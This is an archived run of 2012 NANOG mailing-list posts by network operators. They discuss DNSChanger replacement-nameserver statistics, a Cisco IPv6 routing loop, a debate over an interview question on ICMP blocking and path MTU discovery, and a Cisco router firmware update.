I'll produce a follow up report in less than 3 hours with data from July 5th. Would that help? Andy Andrew Fried andrew.fried at gmail.com On 7/5/12 5:42 PM, Eric Wieling wrote: > A report for a day other than the 4th of July would be very helpful. > > -----Original Message----- > From: Andrew Fried [mailto:andrew.fried at gmail.com] > Sent: Thursday, July 05, 2012 5:26 PM > To: nanog at nanog.org > Subject: Domain changer statistics by ASN > > As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT). > > Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal. > > I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday. > > if you find this of use, I can regenerate new reports later this afternoon with data from the 5th. > > Andy > > -- > Andrew Fried > andrew.fried at gmail.com > > From javier at kjsl.org Thu Jul 5 16:48:16 2012 From: javier at kjsl.org (Javier Henderson) Date: Thu, 5 Jul 2012 17:48:16 -0400 Subject: cisco.com's IPv6 sites have a routing loop In-Reply-To: <00c901cd5af4$1a800510$4f800f30$@iname.com> References: <00c901cd5af4$1a800510$4f800f30$@iname.com> Message-ID: <62A6ED79-40D7-4A17-B2E3-4E45906274A9@kjsl.org> On Jul 5, 2012, at 5:21 PM, Frank Bulk wrote: > Two of Cisco's IPv6 sites, www-v6.cisco.com and www.ipv6.cisco.com, are in a > routing loop: > > 13 10gigabitethernet11-4.core1.sjc2.he.net (2001:470:0:1b4::1) 84.519 ms > 82.710 ms 81.033 ms > 14 10gigabitethernet3-2.core1.pao1.he.net (2001:470:0:32::2) 81.821 ms > 81.826 ms 83.413 ms > 15 ciscosystems.v403.core1.pao1.he.net (2001:470:0:1ee::2) 86.730 ms > 86.694 ms 110.206 ms > 16 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) > 88.269 ms 88.128 ms 88.067 ms > 17 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482) > 111.224 ms 87.687 ms 87.867 ms > 18 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) > 88.117 ms 87.956 ms 88.234 ms > 19 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482) > 87.879 ms 87.804 ms 103.848 ms > 20 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) > 88.339 ms 88.367 ms 88.574 ms > ... > > noc at cisco.com doesn't work and I can't seem find any of Cisco's NOC-related > email addresses in any list that I have. Hopefully someone from Cisco is > lurking. I am, and I passed that along to The Management. -jav From bill at herrin.us Thu Jul 5 17:18:23 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 18:18:23 -0400 Subject: job screening question In-Reply-To: References: Message-ID: On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote: >> > You implement a firewall on which you block all ICMP packets. What >> > part of the TCP protocol (not IP in general, TCP specifically) >> > malfunctions as a result? > > Isn't MTU discovery on IP and not TCP? If you want to overthink the question, the failure in the TCP protocol is that it doesn't adjust the MSS to match the path MTU. It continues to rely on the incorrect path MTU estimate, sending too-large packets which will never arrive. This happens because TCP doesn't receive a notification that the path MTU estimate has changed from the default because the lower layer PMTUD algorithm never receives the expected ICMP packet. This is, incidentally, is a detail I'd love for one of the candidates to offer in response to that question. Bonus points if you discuss MSS clamping and RFC 4821. The less precise answer, path MTU discovery breaks, is just fine. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From EWieling at nyigc.com Thu Jul 5 17:26:16 2012 From: EWieling at nyigc.com (Eric Wieling) Date: Thu, 5 Jul 2012 18:26:16 -0400 Subject: Domain changer statistics by ASN In-Reply-To: <4FF60AF3.6020405@gmail.com> References: <4FF60670.4010404@gmail.com> <4FF60AF3.6020405@gmail.com> Message-ID: July 2nd might be the most accurate. For our customers, July 3rd, 4th, and today have been low volume days because of the holiday. I suspect the same is true for many providers in the USA. -----Original Message----- From: Andrew Fried [mailto:andrew.fried at gmail.com] Sent: Thursday, July 05, 2012 5:45 PM To: Eric Wieling Cc: nanog at nanog.org Subject: Re: Domain changer statistics by ASN We have data going back to November 8, 2011. Generating a report of over 2,000 ASNs, by day, would be too large an attachment for NANOG. I'll produce a follow up report in less than 3 hours with data from July 5th. Would that help? Andy Andrew Fried andrew.fried at gmail.com On 7/5/12 5:42 PM, Eric Wieling wrote: > A report for a day other than the 4th of July would be very helpful. > > -----Original Message----- > From: Andrew Fried [mailto:andrew.fried at gmail.com] > Sent: Thursday, July 05, 2012 5:26 PM > To: nanog at nanog.org > Subject: Domain changer statistics by ASN > > As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT). > > Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal. > > I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday. > > if you find this of use, I can regenerate new reports later this afternoon with data from the 5th. > > Andy > > -- > Andrew Fried > andrew.fried at gmail.com > > From frnkblk at iname.com Thu Jul 5 17:29:32 2012 From: frnkblk at iname.com (Frank Bulk) Date: Thu, 5 Jul 2012 17:29:32 -0500 Subject: Domain changer statistics by ASN In-Reply-To: <4FF60670.4010404@gmail.com> References: <4FF60670.4010404@gmail.com> Message-ID: <00db01cd5afd$a65f46a0$f31dd3e0$@iname.com> Yeah, I see the singular one for our AS. =) We've know it for some time, but older lady is somewhat reluctant to spend money on getting someone to look at it. I spoke to her today and she has two machines, one new, one old. She's going to turn the old one off and hope that we won't see any more Shadowserver reports for it. Frank -----Original Message----- From: Andrew Fried [mailto:andrew.fried at gmail.com] Sent: Thursday, July 05, 2012 4:26 PM To: nanog at nanog.org Subject: Domain changer statistics by ASN As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT). Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal. I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday. if you find this of use, I can regenerate new reports later this afternoon with data from the 5th. Andy -- Andrew Fried andrew.fried at gmail.com From randy_94108 at yahoo.com Thu Jul 5 18:01:49 2012 From: randy_94108 at yahoo.com (Randy) Date: Thu, 5 Jul 2012 16:01:49 -0700 (PDT) Subject: job screening question In-Reply-To: Message-ID: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com> --- On Thu, 7/5/12, William Herrin wrote: > From: William Herrin > Subject: Re: job screening question > To: "Derek Andrew" > Cc: "nanog at nanog.org" > Date: Thursday, July 5, 2012, 3:18 PM > On Thu, Jul 5, 2012 at 5:05 PM, Derek > Andrew > wrote: > >> > You implement a firewall on which you block > all ICMP packets. What > >> > part of the TCP protocol (not IP in general, > TCP specifically) > >> > malfunctions as a result? > > > > Isn't MTU discovery on IP and not TCP? > > If you want to overthink the question, the failure in the > TCP protocol > is that it doesn't adjust the MSS to match the path MTU. It > continues > to rely on the incorrect path MTU estimate, sending > too-large packets > which will never arrive. This happens because TCP doesn't > receive a > notification that the path MTU estimate has changed from the > default > because the lower layer PMTUD algorithm never receives the > expected > ICMP packet. > > This is, incidentally, is a detail I'd love for one of the > candidates > to offer in response to that question. Bonus points if you > discuss MSS > clamping and RFC 4821. > > The less precise answer, path MTU discovery breaks, is just > fine. > > Regards, > Bill Herrin Precisely! and if I understand correctly, a non-techinical person within HR is expected to hear this answer and relay it to you? That is more than a long shot. Unless of course they have photographic memories, are great typists or perhaps do "short hand". ./Randy From diogo.montagner at gmail.com Thu Jul 5 18:20:12 2012 From: diogo.montagner at gmail.com (Diogo Montagner) Date: Fri, 6 Jul 2012 07:20:12 +0800 Subject: job screening question In-Reply-To: References: Message-ID: This type o question where the candidate can elaborate the answer should be asked by a techinal interviewer. For screening questions (for 1st level filtering), IMO, the questions has to be straight to the point, for example: 1) What is the LSA number for an external route in OSPF? This can have two answer: 5 or 7. So, I will accept if the candidate answer 5, 7 or 5 and 7. Later on (the next level of the interview), a techinical interviewer will chech if the candidate understand the differences of LSA 5 and 7. The point is that the candidate cannot deviate from the question, I.e., this question will not generate another question from the candidate to the interviewer asking for more details about the scenario in case. For example, you may ask: which IGP is more reliable under an IP DoS attack? The answer for this question can be very long or may require some sort of interaction between the candidate and the interviewer, which means it has to be asked by techinical people and not by non-techinical interviewers. Thanks On 7/6/12, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > > -- Sent from my mobile device ./diogo -montagner JNCIE-M 0x41A From surfer at mauigateway.com Thu Jul 5 18:48:36 2012 From: surfer at mauigateway.com (Scott Weeks) Date: Thu, 5 Jul 2012 16:48:36 -0700 Subject: job screening question Message-ID: <20120705164836.EEEE1921@resin13.mta.everyone.net> --- diogo.montagner at gmail.com wrote:\ From: Diogo Montagner For screening questions (for 1st level filtering), IMO, the questions has to be straight to the point, for example: 1) What is the LSA number for an external route in OSPF? This can have two answer: 5 or 7. So, I will accept if the candidate answer 5, 7 or 5 and 7. Later on (the next level of the interview), a techinical interviewer will chech if the candidate understand the differences of LSA 5 and 7. ----------------------------------------------------------- How often do you use this in everyday netgeeking? Asking these types of questions will assure that you get someone with a vendor i-drank-the-kool-aid cert because they memorized the answers, but maybe not the best candidate for the position. However, with some of today's managers kool-aid certs are looked on as better than an engineering degree. Go figure... :-( scott From jason at thebaughers.com Thu Jul 5 18:51:34 2012 From: jason at thebaughers.com (Jason Baugher) Date: Thu, 05 Jul 2012 18:51:34 -0500 Subject: job screening question In-Reply-To: References: Message-ID: <4FF62886.5070607@thebaughers.com> Geez, I'd be happy to find someone with a good attitude, a solid work ethic, and the desire and aptitude to learn. :) Jason On 7/5/2012 5:18 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote: >>>> You implement a firewall on which you block all ICMP packets. What >>>> part of the TCP protocol (not IP in general, TCP specifically) >>>> malfunctions as a result? >> Isn't MTU discovery on IP and not TCP? > If you want to overthink the question, the failure in the TCP protocol > is that it doesn't adjust the MSS to match the path MTU. It continues > to rely on the incorrect path MTU estimate, sending too-large packets > which will never arrive. This happens because TCP doesn't receive a > notification that the path MTU estimate has changed from the default > because the lower layer PMTUD algorithm never receives the expected > ICMP packet. > > This is, incidentally, is a detail I'd love for one of the candidates > to offer in response to that question. Bonus points if you discuss MSS > clamping and RFC 4821. > > The less precise answer, path MTU discovery breaks, is just fine. > > Regards, > Bill Herrin > > > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > > From eyeronic.design at gmail.com Thu Jul 5 18:53:18 2012 From: eyeronic.design at gmail.com (Mike Hale) Date: Thu, 5 Jul 2012 16:53:18 -0700 Subject: job screening question In-Reply-To: References: Message-ID: Something tells me you're suddenly going to find yourself with an influx of correct answers... On Thu, Jul 5, 2012 at 3:18 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote: >>> > You implement a firewall on which you block all ICMP packets. What >>> > part of the TCP protocol (not IP in general, TCP specifically) >>> > malfunctions as a result? >> >> Isn't MTU discovery on IP and not TCP? > > If you want to overthink the question, the failure in the TCP protocol > is that it doesn't adjust the MSS to match the path MTU. It continues > to rely on the incorrect path MTU estimate, sending too-large packets > which will never arrive. This happens because TCP doesn't receive a > notification that the path MTU estimate has changed from the default > because the lower layer PMTUD algorithm never receives the expected > ICMP packet. > > This is, incidentally, is a detail I'd love for one of the candidates > to offer in response to that question. Bonus points if you discuss MSS > clamping and RFC 4821. > > The less precise answer, path MTU discovery breaks, is just fine. > > Regards, > Bill Herrin > > > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From surfer at mauigateway.com Thu Jul 5 19:01:39 2012 From: surfer at mauigateway.com (Scott Weeks) Date: Thu, 5 Jul 2012 17:01:39 -0700 Subject: job screening question Message-ID: <20120705170139.EEEE1B26@resin13.mta.everyone.net> --- jason at thebaughers.com wrote: From: Jason Baugher Geez, I'd be happy to find someone with a good attitude, a solid work ethic, and the desire and aptitude to learn. :) --------------------------------------- Yeah, that. But how do you get those folks through the HR process to you, so you can decipher their skill/work ethic level? What can the HR person ask to find out if someone has these qualities? OSPF LSA type questions will not help. I definitely would rather work with a person willing to learn the nuances of the particular network, rather than someone that can spit out canned answers. scott From jlewis at lewis.org Thu Jul 5 19:14:59 2012 From: jlewis at lewis.org (Jon Lewis) Date: Thu, 5 Jul 2012 20:14:59 -0400 (EDT) Subject: job screening question In-Reply-To: References: Message-ID: He'll have to come up with another weedout question, like "what's a /27?" I'm constantly amazed/disappointed when we interview candidates for a senior Linux admin job and they just don't know modern networking at all. Even better question, with multiple right answers, "how many IPs are in a /32?" You could probably have some fun with most applicants[1] when they answer 1, and then you ask "would you like to expand on that answer?" The small (sub /24) subnets are dealt with so frequently in an ISP/hosting provider environment, that IMO, anyone claiming to have experience in such an environment should just flat out know how many IPs and the subnet masks for /32 - /24 in IPv4, or be sufficiently comfortable with subnetting that they can figure these things out quickly enough to avoid awkward pauses during the interview if asked about them. 1) At least the few who get it right. On Thu, 5 Jul 2012, Mike Hale wrote: > Something tells me you're suddenly going to find yourself with an > influx of correct answers... > > On Thu, Jul 5, 2012 at 3:18 PM, William Herrin wrote: >> On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote: >>>>> You implement a firewall on which you block all ICMP packets. What >>>>> part of the TCP protocol (not IP in general, TCP specifically) >>>>> malfunctions as a result? >>> >>> Isn't MTU discovery on IP and not TCP? >> >> If you want to overthink the question, the failure in the TCP protocol >> is that it doesn't adjust the MSS to match the path MTU. It continues >> to rely on the incorrect path MTU estimate, sending too-large packets >> which will never arrive. This happens because TCP doesn't receive a >> notification that the path MTU estimate has changed from the default >> because the lower layer PMTUD algorithm never receives the expected >> ICMP packet. >> >> This is, incidentally, is a detail I'd love for one of the candidates >> to offer in response to that question. Bonus points if you discuss MSS >> clamping and RFC 4821. >> >> The less precise answer, path MTU discovery breaks, is just fine. >> >> Regards, >> Bill Herrin >> >> >> >> >> -- >> William D. Herrin ................ herrin at dirtside.com bill at herrin.us >> 3005 Crane Dr. ...................... Web: >> Falls Church, VA 22042-3004 >> > > > > -- > 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 > ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From owen at delong.com Thu Jul 5 19:22:49 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 17:22:49 -0700 Subject: job screening question In-Reply-To: References: Message-ID: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> I would use questions such as the following: 1. How many end-sites can be numbered from a single /32. (Correct answers: IPv4 - 1, IPv6 - 65,536) 2. In what circumstance might you need to use IPSEC to secure OSPF instead of MD5 authentication? 3. How many /32s can be created from a single /24? (Hint, this answer is the same for IPv4 and IPv6) 4. What is the purpose of an IP address such as ::ffff:192.0.2.123? 5. What is the reason for the 100m distance limit within an ethernet collision domain? The essay questions can wait for the interview if they get past these basics. Owen On Jul 5, 2012, at 5:14 PM, Jon Lewis wrote: > He'll have to come up with another weedout question, like "what's a /27?" I'm constantly amazed/disappointed when we interview candidates for a senior Linux admin job and they just don't know modern networking at all. > > Even better question, with multiple right answers, "how many IPs are in a /32?" You could probably have some fun with most applicants[1] when they answer 1, and then you ask "would you like to expand on that answer?" > > The small (sub /24) subnets are dealt with so frequently in an ISP/hosting provider environment, that IMO, anyone claiming to have experience in such an environment should just flat out know how many IPs and the subnet masks for /32 - /24 in IPv4, or be sufficiently comfortable with subnetting that they can figure these things out quickly enough to avoid awkward pauses during the interview if asked about them. > > 1) At least the few who get it right. > > On Thu, 5 Jul 2012, Mike Hale wrote: > >> Something tells me you're suddenly going to find yourself with an >> influx of correct answers... >> >> On Thu, Jul 5, 2012 at 3:18 PM, William Herrin wrote: >>> On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote: >>>>>> You implement a firewall on which you block all ICMP packets. What >>>>>> part of the TCP protocol (not IP in general, TCP specifically) >>>>>> malfunctions as a result? >>>> >>>> Isn't MTU discovery on IP and not TCP? >>> >>> If you want to overthink the question, the failure in the TCP protocol >>> is that it doesn't adjust the MSS to match the path MTU. It continues >>> to rely on the incorrect path MTU estimate, sending too-large packets >>> which will never arrive. This happens because TCP doesn't receive a >>> notification that the path MTU estimate has changed from the default >>> because the lower layer PMTUD algorithm never receives the expected >>> ICMP packet. >>> >>> This is, incidentally, is a detail I'd love for one of the candidates >>> to offer in response to that question. Bonus points if you discuss MSS >>> clamping and RFC 4821. >>> >>> The less precise answer, path MTU discovery breaks, is just fine. >>> >>> Regards, >>> Bill Herrin >>> >>> >>> >>> >>> -- >>> William D. Herrin ................ herrin at dirtside.com bill at herrin.us >>> 3005 Crane Dr. ...................... Web: >>> Falls Church, VA 22042-3004 >>> >> >> >> >> -- >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >> > > ---------------------------------------------------------------------- > Jon Lewis, MCP :) | I route > Senior Network Engineer | therefore you are > Atlantic Net | > _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From bill at herrin.us Thu Jul 5 19:32:46 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 20:32:46 -0400 Subject: job screening question In-Reply-To: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote: > I would use questions such as the following: > > 1. How many end-sites can be numbered from a single /32. > (Correct answers: IPv4 - 1, IPv6 - 65,536) IPv6 - 16,777,216 to 268,435,456 :p > 5. What is the reason for the 100m distance limit within an ethernet collision domain? What's an ethernet collision domain? Seriously, when was the last time you dealt with a half duplex ethernet? Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From george.herbert at gmail.com Thu Jul 5 19:47:16 2012 From: george.herbert at gmail.com (George Herbert) Date: Thu, 5 Jul 2012 17:47:16 -0700 Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: <961A10EE-5DB7-444E-BFD9-28D7AE2DF3AA@gmail.com> On Jul 5, 2012, at 5:32 PM, William Herrin wrote: > >> 5. What is the reason for the 100m distance limit within an ethernet collision domain? > > What's an ethernet collision domain? Seriously, when was the last time > you dealt with a half duplex ethernet? > Last time I built a cluster; admin and some redundant ingress/egress methods do better with hubs than switches. Also last time I had to build a cheap redundant firewall. This is a corner case, but if you just know ether as a point to point it will eventually bite you. Having some spanning tree clue is much more relevant now, though. George William Herbert Sent from my iPhone From surfer at mauigateway.com Thu Jul 5 19:50:52 2012 From: surfer at mauigateway.com (Scott Weeks) Date: Thu, 5 Jul 2012 17:50:52 -0700 Subject: job screening question Message-ID: <20120705175052.EEEE1F88@resin13.mta.everyone.net> --- bill at herrin.us wrote: From: William Herrin > 5. What is the reason for the 100m distance limit within an ethernet collision domain? What's an ethernet collision domain? Seriously, when was the last time you dealt with a half duplex ethernet? ----------------------------------------- Now if someone answered it that way, I'd definitely be interested while the HR person would just hang up... scott From randy_94108 at yahoo.com Thu Jul 5 20:06:04 2012 From: randy_94108 at yahoo.com (Randy) Date: Thu, 5 Jul 2012 18:06:04 -0700 (PDT) Subject: job screening question In-Reply-To: <20120705175052.EEEE1F88@resin13.mta.everyone.net> Message-ID: <1341536764.83378.YahooMailClassic@web181117.mail.ne1.yahoo.com> apologies for top posting. Everyone, including me have addressed "what/how/by who wrt question at hand. Bill- Another poster has already asked this question- Can you post a sample of the "answers" you have received; which prompted you the ask this question to begin with. ./Randy --- On Thu, 7/5/12, Scott Weeks wrote: > From: Scott Weeks > Subject: Re: job screening question > To: nanog at nanog.org > Date: Thursday, July 5, 2012, 5:50 PM > > > --- bill at herrin.us > wrote: > From: William Herrin > > > 5.? ? ? What is the reason for the 100m > distance limit within an ethernet collision domain? > > What's an ethernet collision domain? Seriously, when was the > last time > you dealt with a half duplex ethernet? > ----------------------------------------- > > > Now if someone answered it that way, I'd definitely be > interested while the HR person would just hang up... > > scott > > From bill at herrin.us Thu Jul 5 20:09:55 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 21:09:55 -0400 Subject: job screening question In-Reply-To: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com> References: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com> Message-ID: On Thu, Jul 5, 2012 at 7:01 PM, Randy wrote: > --- On Thu, 7/5/12, William Herrin wrote: >> The less precise answer, path MTU discovery breaks, is just >> fine. > > Precisely! and if I understand correctly, a non-techinical person > within HR is expected to hear this answer and relay it to you? > That is more than a long shot. Unless of course they have > photographic memories, are great typists or perhaps do >"short hand". So I get a garbled answer about disk fragmentation. I can't tell the difference between an answer garbled in transit and an answer that was flat wrong to begin with? The point of the question is to help me decide which people I want to spend half an hour on the phone with and which ones get a polite thank-you-not-it from HR while I do the parts of my job that don't involve interviewing folks. If there's any doubt about whether they belong in the not-it category, they proceed to the phone interview. Regards, Bill Herrin P.S. Yes, I got an answer about "degrading DNS port unreachables and MTU disk fragmenting as well." I asked HR to set up a phone interview. If that wasn't an HR garble, I *really* want to hear the explanation. :D -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From valdis.kletnieks at vt.edu Thu Jul 5 20:17:32 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Thu, 05 Jul 2012 21:17:32 -0400 Subject: job screening question In-Reply-To: Your message of "Thu, 05 Jul 2012 15:05:01 -0600." References: Message-ID: <34255.1341537452@turing-police.cc.vt.edu> On Thu, 05 Jul 2012 15:05:01 -0600, Derek Andrew said: > Isn't MTU discovery on IP and not TCP? AIX actually supported PMTUD for UDP. Not sure if it still does. Yes, it was bizarro even for AIX. No, I'm not aware of any actual UDP applications that were able to do anything useful with this info. ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From jlewis at lewis.org Thu Jul 5 20:28:16 2012 From: jlewis at lewis.org (Jon Lewis) Date: Thu, 5 Jul 2012 21:28:16 -0400 (EDT) Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: On Thu, 5 Jul 2012, William Herrin wrote: > On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote: >> I would use questions such as the following: >> >> 1. How many end-sites can be numbered from a single /32. >> (Correct answers: IPv4 - 1, IPv6 - 65,536) > > IPv6 - 16,777,216 to 268,435,456 :p > > >> 5. What is the reason for the 100m distance limit within an ethernet collision domain? > > What's an ethernet collision domain? Seriously, when was the last time > you dealt with a half duplex ethernet? You've never (much less recently) seen a customer misconfigure their end of an ethernet handoff such that you end up with duplex mismatch? Granted, in that case, distance is irrelevant...but it is half half-duplex ethernet :) ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From bill at herrin.us Thu Jul 5 20:33:53 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 21:33:53 -0400 Subject: job screening question In-Reply-To: <1341536764.83378.YahooMailClassic@web181117.mail.ne1.yahoo.com> References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <1341536764.83378.YahooMailClassic@web181117.mail.ne1.yahoo.com> Message-ID: > Can you post a sample of the "answers" you have received; which > prompted you the ask this question to begin with. I've been asking the question in phone interviews for months. I couldn't quote them properly but the answers were... discouraging. No one beyond ping and traceroute. I asked HR last week to start asking the question as a pre-screen and forward me the answer. The first one responded "This would block all IP traffic." I figured it was time for a sanity check to make sure the question was reasonable. Regards, Bill -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From bicknell at ufp.org Thu Jul 5 20:36:34 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Thu, 5 Jul 2012 18:36:34 -0700 Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: <20120706013634.GA25986@ussenterprise.ufp.org> In a message written on Thu, Jul 05, 2012 at 08:32:46PM -0400, William Herrin wrote: > What's an ethernet collision domain? Seriously, when was the last time > you dealt with a half duplex ethernet? 5 segments 4 repeaters 3 segments with transmitting hosts 2 transit segments 1 collision domain If any employer thought that was useful knowledge for a job today I would probably run away, as fast as possible! -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From bill at herrin.us Thu Jul 5 20:43:29 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 21:43:29 -0400 Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: On Thu, Jul 5, 2012 at 9:28 PM, Jon Lewis wrote: > You've never (much less recently) seen a customer misconfigure their end of > an ethernet handoff such that you end up with duplex mismatch? Granted, in > that case, distance is irrelevant...but it is half half-duplex ethernet :) If I was asking an ethernet question, I'd rather ask: 1. How do you make a crossover ethernet cable to connect two switches? (cross the green and orange pairs) 2. What happens if you plug that cable into a pair of gigabit ethernet switches? (mdix malfunctions, ports negotiate to 100 full, on some poorly implemented switches the mix of straight and crossed wires eventually damage the ports so they can no longer do gige) Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From kmedcalf at dessus.com Thu Jul 5 20:43:53 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Thu, 05 Jul 2012 19:43:53 -0600 Subject: Cisco Update In-Reply-To: <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info> Message-ID: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> I see. Replace "local access" control with "let anyone on the internet reconfigure the thing". Whoever's idea it was should be p*ssed on, keelhauled, drawn and quartered, then burned at the stake. --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org > -----Original Message----- > From: Sean Harlow [mailto:sean at seanharlow.info] > Sent: Thursday, 05 July, 2012 10:26 > To: Hank Nussbacher > Cc: nanog at nanog.org > Subject: Re: Cisco Update > > On Jul 5, 2012, at 12:08, Hank Nussbacher wrote: > > > For those of us who have not kept up with every latest feature that Cisco > rolls out across all its platforms, can someone explain this new service? Is > it like Windows update, where Cisco will auto-update your router s/w and > thereby brick it? If I don't register my router with Cisco, what do I lose? > I can't update it manually? > > Long story short, the affected routers (newer "Cisco" [former Linksys] > consumer products) received an automatic firmware update which basically > disables the device's onboard web UI and forces you to use Cisco's "cloud" > management system. The biggest issue with this is that apparently it has > some function, possibly for web filtering, which sends network traffic > information of some sort to Cisco's service. They also state that regardless > of the auto-update setting a device may be updated anyways if Cisco says so. > > One article I found says it affects the E2700, E3500, and E4500 models. > From scott at doc.net.au Thu Jul 5 20:45:26 2012 From: scott at doc.net.au (Scott Howard) Date: Thu, 5 Jul 2012 18:45:26 -0700 Subject: job screening question In-Reply-To: <4FF5CC01.6010504@davidcoulson.net> References: <4FF5CC01.6010504@davidcoulson.net> Message-ID: On Thu, Jul 5, 2012 at 10:16 AM, David Coulson wrote: > What if they said "it would cause the generation of port-unreachable ICMP > packets to cease, and applications may hang until they timeout"? Not the > answer you're looking for, but not wrong either. > Umm, yeah, it is wrong. The question was TCP. TCP doesn't send ICMP Port-Unreach, it sends RST packets. Scott From diogo.montagner at gmail.com Thu Jul 5 20:47:07 2012 From: diogo.montagner at gmail.com (Diogo Montagner) Date: Fri, 6 Jul 2012 09:47:07 +0800 Subject: job screening question In-Reply-To: <20120705164836.EEEE1921@resin13.mta.everyone.net> References: <20120705164836.EEEE1921@resin13.mta.everyone.net> Message-ID: Maybe I was not too clear with my answer. The main idea was to execute a first level of 